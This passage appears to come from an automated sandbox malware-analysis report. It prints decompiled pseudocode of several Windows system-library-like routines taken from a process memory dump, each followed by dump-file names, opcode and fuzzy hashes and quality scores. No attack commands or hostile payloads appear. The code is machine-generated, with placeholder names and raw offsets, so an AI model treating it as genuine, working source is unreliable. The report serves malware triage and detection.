              					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
              					_t23 = L04BE4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
              					_t56 = _t23;
              					if(_t56 != 0) {
              						_t56[0x24] = _a4;
              						_t56[0x28] = _a8;
              						_t56[6] = 0x1420;
              						_t56[0x20] = _v12;
              						_t14 =  &(_t56[0x2c]); // 0x2c
              						E04C0F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
              						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
              						if(E04BE7D50() != 0) {
              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              						}
              						_push(_t56);
              						_push(_t47 - 0x20);
              						_push(0x402);
              						_push( *_t58 & 0x000000ff);
              						E04C09AE0();
              						_t23 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
              					}
              				}
              				return _t23;
              			}













              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c8284ab5145f5bc5e71a0c83d07d992ea19e7a34953da6da15b5df404ad067d
              • Instruction ID: be64bdae74312822451d9d644a1fee9749b1ac86b690e4e797dfafb2a48b6bd9
              • Opcode Fuzzy Hash: 7c8284ab5145f5bc5e71a0c83d07d992ea19e7a34953da6da15b5df404ad067d
              • Instruction Fuzzy Hash: D421ABB1A00644AFD715DB69D980F2AB7B8FF88704F1440AAF904C7791DB38ED50CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 82%
              			E04C090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
              				intOrPtr* _v0;
              				void* _v8;
              				signed int _v12;
              				intOrPtr _v16;
              				char _v36;
              				void* _t38;
              				intOrPtr _t41;
              				void* _t44;
              				signed int _t45;
              				intOrPtr* _t49;
              				signed int _t57;
              				signed int _t58;
              				intOrPtr* _t59;
              				void* _t62;
              				void* _t63;
              				void* _t65;
              				void* _t66;
              				signed int _t69;
              				intOrPtr* _t70;
              				void* _t71;
              				intOrPtr* _t72;
              				intOrPtr* _t73;
              				char _t74;
              
              				_t65 = __edx;
              				_t57 = _a4;
              				_t32 = __ecx;
              				_v8 = __edx;
              				_t3 = _t32 + 0x14c; // 0x14c
              				_t70 = _t3;
              				_v16 = __ecx;
              				_t72 =  *_t70;
              				while(_t72 != _t70) {
              					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
              						L24:
              						_t72 =  *_t72;
              						continue;
              					}
              					_t30 = _t72 + 0x10; // 0x10
              					if(E04C1D4F0(_t30, _t65, _t57) == _t57) {
              						return 0xb7;
              					}
              					_t65 = _v8;
              					goto L24;
              				}
              				_t61 = _t57;
              				_push( &_v12);
              				_t66 = 0x10;
              				if(E04BFE5E0(_t57, _t66) < 0) {
              					return 0x216;
              				}
              				_t73 = L04BE4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
              				if(_t73 == 0) {
              					_t38 = 0xe;
              					return _t38;
              				}
              				_t9 = _t73 + 0x10; // 0x10
              				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
              				E04C0F3E0(_t9, _v8, _t57);
              				_t41 =  *_t70;
              				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
              					_t62 = 3;
              					asm("int 0x29");
              					_push(_t62);
              					_push(_t57);
              					_push(_t73);
              					_push(_t70);
              					_t71 = _t62;
              					_t74 = 0;
              					_v36 = 0;
              					_t63 = E04BFA2F0(_t62, _t71, 1, 6,  &_v36);
              					if(_t63 == 0) {
              						L20:
              						_t44 = 0x57;
              						return _t44;
              					}
              					_t45 = _v12;
              					_t58 = 0x1c;
              					if(_t45 < _t58) {
              						goto L20;
              					}
              					_t69 = _t45 / _t58;
              					if(_t69 == 0) {
              						L19:
              						return 0xe8;
              					}
              					_t59 = _v0;
              					do {
              						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
              							goto L18;
              						}
              						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
              						 *_t59 = _t49;
              						if( *_t49 != 0x53445352) {
              							goto L18;
              						}
              						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
              						return 0;
              						L18:
              						_t63 = _t63 + 0x1c;
              						_t74 = _t74 + 1;
              					} while (_t74 < _t69);
              					goto L19;
              				}
              				 *_t73 = _t41;
              				 *((intOrPtr*)(_t73 + 4)) = _t70;
              				 *((intOrPtr*)(_t41 + 4)) = _t73;
              				 *_t70 = _t73;
              				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
              				return 0;
              			}



























              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
              • Instruction ID: cd16948fbad103fc04bab473211f471f9c935fe15fb058e2fb74298fa5a852b4
              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
              • Instruction Fuzzy Hash: BD21B0B5A00204EFDB20DF59C944B6AF7F9EB48314F14C86AE989A7251D370FD40CB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E04BF3B7A(void* __ecx) {
              				signed int _v8;
              				char _v12;
              				intOrPtr _v20;
              				intOrPtr _t17;
              				intOrPtr _t26;
              				void* _t35;
              				void* _t38;
              				void* _t41;
              				intOrPtr _t44;
              
              				_t17 =  *0x4cb84c4; // 0x0
              				_v12 = 1;
              				_v8 =  *0x4cb84c0 * 0x4c;
              				_t41 = __ecx;
              				_t35 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4cb84c0 * 0x4c);
              				if(_t35 == 0) {
              					_t44 = 0xc0000017;
              				} else {
              					_push( &_v8);
              					_push(_v8);
              					_push(_t35);
              					_push(4);
              					_push( &_v12);
              					_push(0x6b);
              					_t44 = E04C0AA90();
              					_v20 = _t44;
              					if(_t44 >= 0) {
              						E04C0FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4cb84c0 * 0xc);
              						_t38 = _t35;
              						if(_t35 < _v8 + _t35) {
              							do {
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
              							} while (_t38 < _v8 + _t35);
              							_t44 = _v20;
              						}
              					}
              					_t26 =  *0x4cb84c4; // 0x0
              					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
              				}
              				return _t44;
              			}













              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1456248eae67004652e5602fce99c39219a51f89b34dc3877f4f994b436d444
              • Instruction ID: e89f10b30f9faf501b110523da123f6a3077081e228818db565e6aaa51acf0d2
              • Opcode Fuzzy Hash: e1456248eae67004652e5602fce99c39219a51f89b34dc3877f4f994b436d444
              • Instruction Fuzzy Hash: 3B21B072600104AFD700DF58CD81B6AB7BDFB40308F1500A8EA08AB251D371BD159BE0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E04C46CF0(void* __edx, intOrPtr _a4, short _a8) {
              				char _v8;
              				char _v12;
              				char _v16;
              				char _v20;
              				char _v28;
              				char _v36;
              				char _v52;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed char* _t21;
              				void* _t24;
              				void* _t36;
              				void* _t38;
              				void* _t46;
              
              				_push(_t36);
              				_t46 = __edx;
              				_v12 = 0;
              				_v8 = 0;
              				_v20 = 0;
              				_v16 = 0;
              				if(E04BE7D50() == 0) {
              					_t21 = 0x7ffe0384;
              				} else {
              					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
              				}
              				if( *_t21 != 0) {
              					_t21 =  *[fs:0x30];
              					if((_t21[0x240] & 0x00000004) != 0) {
              						if(E04BE7D50() == 0) {
              							_t21 = 0x7ffe0385;
              						} else {
              							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
              						}
              						if(( *_t21 & 0x00000020) != 0) {
              							_t56 = _t46;
              							if(_t46 == 0) {
              								_t46 = 0x4ba5c80;
              							}
              							_push(_t46);
              							_push( &_v12);
              							_t24 = E04BFF6E0(_t36, 0, _t46, _t56);
              							_push(_a4);
              							_t38 = _t24;
              							_push( &_v28);
              							_t21 = E04BFF6E0(_t38, 0, _t46, _t56);
              							if(_t38 != 0) {
              								if(_t21 != 0) {
              									E04C47016(_a8, 0, 0, 0,  &_v36,  &_v28);
              									L04BE2400( &_v52);
              								}
              								_t21 = L04BE2400( &_v28);
              							}
              						}
              					}
              				}
              				return _t21;
              			}




















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 722c4944638a17856da45bb0b59dbef21afa9464922950eb8253aa25cc3fa43d
              • Instruction ID: 7e464865869fa4763c5af31aa358ff724d7c67c7c40667880432695a6125cc99
              • Opcode Fuzzy Hash: 722c4944638a17856da45bb0b59dbef21afa9464922950eb8253aa25cc3fa43d
              • Instruction Fuzzy Hash: AA21D472604344ABD711DF69CA44F6BB7EDEFC2748F080596F940C7255EB38EA08C6A2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E04C9070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
              				char _v8;
              				intOrPtr _v11;
              				signed int _v12;
              				intOrPtr _v15;
              				signed int _v16;
              				intOrPtr _v28;
              				void* __ebx;
              				char* _t32;
              				signed int* _t38;
              				signed int _t60;
              
              				_t38 = __ecx;
              				_v16 = __edx;
              				_t60 = E04C907DF(__ecx, __edx,  &_a4,  &_a8, 2);
              				if(_t60 != 0) {
              					_t7 = _t38 + 0x38; // 0x29cd5903
              					_push( *_t7);
              					_t9 = _t38 + 0x34; // 0x6adeeb00
              					_push( *_t9);
              					_v12 = _a8 << 0xc;
              					_t11 = _t38 + 4; // 0x5de58b5b
              					_push(0x4000);
              					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
              					E04C8AFDE( &_v8,  &_v12);
              					E04C91293(_t38, _v28, _t60);
              					if(E04BE7D50() == 0) {
              						_t32 = 0x7ffe0380;
              					} else {
              						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              					}
              					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
              						_t21 = _t38 + 0x3c; // 0xc3595e5f
              						E04C814FB(_t38,  *_t21, _v11, _v15, 0xd);
              					}
              				}
              				return  ~_t60;
              			}














              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
              • Instruction ID: e28701698e7ad9845cd5d8dddf88f1c8a689cde7dda22719189163c9ebbbe371
              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
              • Instruction Fuzzy Hash: 2621F236204204AFDB05DF19C884A6ABBE6EBC4364F088569F9958B381DB30ED09CB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E04BEAE73(intOrPtr __ecx, void* __edx) {
              				intOrPtr _v8;
              				void* _t19;
              				char* _t22;
              				signed char* _t24;
              				intOrPtr _t25;
              				intOrPtr _t27;
              				void* _t31;
              				intOrPtr _t36;
              				char* _t38;
              				signed char* _t42;
              
              				_push(__ecx);
              				_t31 = __edx;
              				_v8 = __ecx;
              				_t19 = E04BE7D50();
              				_t38 = 0x7ffe0384;
              				if(_t19 != 0) {
              					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              				} else {
              					_t22 = 0x7ffe0384;
              				}
              				_t42 = 0x7ffe0385;
              				if( *_t22 != 0) {
              					if(E04BE7D50() == 0) {
              						_t24 = 0x7ffe0385;
              					} else {
              						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              					}
              					if(( *_t24 & 0x00000010) != 0) {
              						goto L17;
              					} else {
              						goto L3;
              					}
              				} else {
              					L3:
              					_t27 = E04BE7D50();
              					if(_t27 != 0) {
              						_t27 =  *[fs:0x30];
              						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
              					}
              					if( *_t38 != 0) {
              						_t27 =  *[fs:0x30];
              						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
              							goto L5;
              						}
              						_t27 = E04BE7D50();
              						if(_t27 != 0) {
              							_t27 =  *[fs:0x30];
              							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
              						}
              						if(( *_t42 & 0x00000020) != 0) {
              							L17:
              							_t25 = _v8;
              							_t36 = 0;
              							if(_t25 != 0) {
              								_t36 =  *((intOrPtr*)(_t25 + 0x18));
              							}
              							_t27 = E04C47794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
              						}
              						goto L5;
              					} else {
              						L5:
              						return _t27;
              					}
              				}
              			}














              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
              • Instruction ID: 4af8687ec24ade3178cff0e96affd659d911f1065cb39e5e3e2dd18bada674c3
              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
              • Instruction Fuzzy Hash: 8021F371601684DFEF269B2AC944B3577EAEF84344F1904E1DD048B7A2EB34FD40D6A0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 82%
              			E04C47794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
              				intOrPtr _v8;
              				intOrPtr _v12;
              				intOrPtr _t21;
              				void* _t24;
              				intOrPtr _t25;
              				void* _t36;
              				short _t39;
              				signed char* _t42;
              				unsigned int _t46;
              				void* _t50;
              
              				_push(__ecx);
              				_push(__ecx);
              				_t21 =  *0x4cb7b9c; // 0x0
              				_t46 = _a8;
              				_v12 = __edx;
              				_v8 = __ecx;
              				_t4 = _t46 + 0x2e; // 0x2e
              				_t36 = _t4;
              				_t24 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
              				_t50 = _t24;
              				if(_t50 != 0) {
              					_t25 = _a4;
              					if(_t25 == 5) {
              						L3:
              						_t39 = 0x14b1;
              					} else {
              						_t39 = 0x14b0;
              						if(_t25 == 6) {
              							goto L3;
              						}
              					}
              					 *((short*)(_t50 + 6)) = _t39;
              					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
              					_t11 = _t50 + 0x2c; // 0x2c
              					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
              					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
              					E04C0F3E0(_t11, _a12, _t46);
              					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
              					if(E04BE7D50() == 0) {
              						_t42 = 0x7ffe0384;
              					} else {
              						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              					}
              					_push(_t50);
              					_t19 = _t36 - 0x20; // 0xe
              					_push(0x403);
              					_push( *_t42 & 0x000000ff);
              					E04C09AE0();
              					_t24 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
              				}
              				return _t24;
              			}














              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 500af4d254217f8d46039f9efe849c88c1602bb4f452da0f5cbfb2497fc34bf8
              • Instruction ID: 97ce4fb56c3b54d20daa64ea7cd160d8a968c5edde689fb685274d946111f70d
              • Opcode Fuzzy Hash: 500af4d254217f8d46039f9efe849c88c1602bb4f452da0f5cbfb2497fc34bf8
              • Instruction Fuzzy Hash: 2321AE72901604AFC725DF69D980E6BB7A9EF88350F10456DF90AD7790EB34EA00CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E04BFFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
              				intOrPtr _v8;
              				void* _t19;
              				intOrPtr _t29;
              				intOrPtr _t32;
              				intOrPtr _t35;
              				intOrPtr _t37;
              				intOrPtr* _t40;
              
              				_t35 = __edx;
              				_push(__ecx);
              				_push(__ecx);
              				_t37 = 0;
              				_v8 = __edx;
              				_t29 = __ecx;
              				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
              					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
              					L3:
              					_t19 = _a4 - 4;
              					if(_t19 != 0) {
              						if(_t19 != 1) {
              							L7:
              							return _t37;
              						}
              						if(_t35 == 0) {
              							L11:
              							_t37 = 0xc000000d;
              							goto L7;
              						}
              						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
              							L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
              							_t35 = _v8;
              						}
              						 *((intOrPtr*)(_t40 + 4)) = _t35;
              						goto L7;
              					}
              					if(_t29 == 0) {
              						goto L11;
              					}
              					_t32 =  *_t40;
              					if(_t32 != 0) {
              						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
              						E04BD76E2( *_t40);
              					}
              					 *_t40 = _t29;
              					goto L7;
              				}
              				_t40 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
              				if(_t40 == 0) {
              					_t37 = 0xc0000017;
              					goto L7;
              				}
              				_t35 = _v8;
              				 *_t40 = 0;
              				 *((intOrPtr*)(_t40 + 4)) = 0;
              				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
              				goto L3;
              			}











              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
              • Instruction ID: 9d90c3707b45043b7f18cb6eec31fb9693da14b8a04ed66aa0ca51c33a75a57b
              • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
              • Instruction Fuzzy Hash: 0B217976A00A40DFD735CF0AC940A76B7E5EB94B10F2485AEEA4987A11E730BD04EB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E04BC9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t33;
              				intOrPtr _t37;
              				intOrPtr _t41;
              				intOrPtr* _t46;
              				void* _t48;
              				intOrPtr _t50;
              				intOrPtr* _t60;
              				void* _t61;
              				intOrPtr _t62;
              				intOrPtr _t65;
              				void* _t66;
              				void* _t68;
              
              				_push(0xc);
              				_push(0x4c9f708);
              				E04C1D08C(__ebx, __edi, __esi);
              				_t65 = __ecx;
              				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
              				if( *(__ecx + 0x24) != 0) {
              					_push( *(__ecx + 0x24));
              					E04C095D0();
              					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
              				}
              				L6();
              				L6();
              				_push( *((intOrPtr*)(_t65 + 0x28)));
              				E04C095D0();
              				_t33 =  *0x4cb84c4; // 0x0
              				L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
              				_t37 =  *0x4cb84c4; // 0x0
              				L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
              				_t41 =  *0x4cb84c4; // 0x0
              				E04BE2280(L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4cb86b4);
              				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
              				_t46 = _t65 + 0xe8;
              				_t62 =  *_t46;
              				_t60 =  *((intOrPtr*)(_t46 + 4));
              				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
              					_t61 = 3;
              					asm("int 0x29");
              					_push(_t65);
              					_t66 = _t61;
              					_t23 = _t66 + 0x14; // 0x8df8084c
              					_push( *_t23);
              					E04C095D0();
              					_t24 = _t66 + 0x10; // 0x89e04d8b
              					_push( *_t24);
              					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
              					_t48 = E04C095D0();
              					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
              					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
              					return _t48;
              				} else {
              					 *_t60 = _t62;
              					 *((intOrPtr*)(_t62 + 4)) = _t60;
              					 *(_t68 - 4) = 0xfffffffe;
              					E04BC9325();
              					_t50 =  *0x4cb84c4; // 0x0
              					return E04C1D0D1(L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
              				}
              			}
















              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 46e3952246fd07d9fd655cdad038ec7d0c2e04debd48a4584fbdd32722d21195
              • Instruction ID: 503052d557611e8909130f7a314b744e51d232688fc7db03faef46fd2d4715b9
              • Opcode Fuzzy Hash: 46e3952246fd07d9fd655cdad038ec7d0c2e04debd48a4584fbdd32722d21195
              • Instruction Fuzzy Hash: EE211972041A00DFD725EF68CA40B59B7B9FF48708F1445ACA049876B2CB34F951DF94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 54%
              			E04BFB390(void* __ecx, intOrPtr _a4) {
              				signed int _v8;
              				signed char _t12;
              				signed int _t16;
              				signed int _t21;
              				void* _t28;
              				signed int _t30;
              				signed int _t36;
              				signed int _t41;
              
              				_push(__ecx);
              				_t41 = _a4 + 0xffffffb8;
              				E04BE2280(_t12, 0x4cb8608);
              				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
              				asm("sbb edi, edi");
              				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
              				_v8 = _t36;
              				asm("lock cmpxchg [ebx], ecx");
              				_t30 = 1;
              				if(1 != 1) {
              					while(1) {
              						_t21 = _t30 & 0x00000006;
              						_t16 = _t30;
              						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
              						asm("lock cmpxchg [edi], esi");
              						if(_t16 == _t30) {
              							break;
              						}
              						_t30 = _t16;
              					}
              					_t36 = _v8;
              					if(_t21 == 2) {
              						_t16 = E04C000C2(0x4cb8608, 0, _t28);
              					}
              				}
              				if(_t36 != 0) {
              					_t16 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
              				}
              				return _t16;
              			}












              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d16b686384b0207affd45bc3a15c53ddd4e34aab8957fda1a67d1d28bee29c8a
              • Instruction ID: 9bfcd904b1471b5d88ebf24b5320d3df934617724192d6dba183e905b0e44bf9
              • Opcode Fuzzy Hash: d16b686384b0207affd45bc3a15c53ddd4e34aab8957fda1a67d1d28bee29c8a
              • Instruction Fuzzy Hash: 4A1148733451109BDB189A15DD81A6B729BEBC5334F294169DA5A97380D932BC06C6D0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E04C446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
              				signed short* _v8;
              				unsigned int _v12;
              				intOrPtr _v16;
              				signed int _t22;
              				signed char _t23;
              				short _t32;
              				void* _t38;
              				char* _t40;
              
              				_v12 = __edx;
              				_t29 = 0;
              				_v8 = __ecx;
              				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
              				_t38 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
              				if(_t38 != 0) {
              					_t40 = _a4;
              					 *_t40 = 1;
              					E04C0F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
              					_t22 = _v12 >> 1;
              					_t32 = 0x2e;
              					 *((short*)(_t38 + _t22 * 2)) = _t32;
              					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
              					_t23 = E04BFD268(_t38, 1);
              					asm("sbb al, al");
              					 *_t40 =  ~_t23 + 1;
              					L04BE77F0(_v16, 0, _t38);
              				} else {
              					 *_a4 = 0;
              					_t29 = 0xc0000017;
              				}
              				return _t29;
              			}












              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
